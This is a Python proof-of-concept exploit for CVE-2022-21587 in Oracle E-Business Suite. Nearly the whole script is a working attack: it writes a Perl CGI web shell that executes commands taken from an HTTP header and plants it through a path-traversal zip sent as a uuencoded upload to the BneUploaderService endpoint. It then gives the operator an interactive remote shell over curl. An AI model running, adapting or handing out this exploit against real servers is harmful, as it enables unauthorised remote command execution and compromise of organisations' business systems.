#!/usr/bin/python3
#POC by HMs
#CVE-2022-21587

import requests
import os
import sys


shell = ''' 
use CGI;
print CGI::header( -type => 'text/plain' );
my $cmd = CGI::http('HTTP_CMD');
print system($cmd);
exit 0;
'''

def Write_Shell():
	with open("txkFNDWRR.pl", "w") as f:
		f.writelines("%s \n" %(shell))
	os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl")
	os.system("uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue")

def exploit():
	Write_Shell()
	host = sys.argv[1]
	if host.endswith == '/':
		url = host + 'OA_HTML/BneUploaderService?bne:uueupload=true'
		url_shell = host + '/OA_CGI/FNDWRR.exe'
	else:
		url = host + '/OA_HTML/BneUploaderService?bne:uueupload=true'
		url_shell = host + '/OA_CGI/FNDWRR.exe'
	file = 't.uue'
	up = {
		'text':(file,open(file, 'rb'), 
			"multipart/mixed"
			)
		}
	request = requests.post(url,files=up)
	if request.status_code == 200:
		print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n')
		print('`press q || Q || quit to exit !!!` \n\n')
		print('`exploit: python3 http|https://example.com` \n\n')
		while True:
			cmd = input("~shell[~]: ")
			if cmd == 'q' or cmd == 'quit' or cmd == 'Q':
				break
			else:
				os.system("curl -ks '%s' -H 'cmd: %s'" % (url_shell,cmd))
	else:
		print('not vuln!')			

if __name__ == '__main__':
	exploit()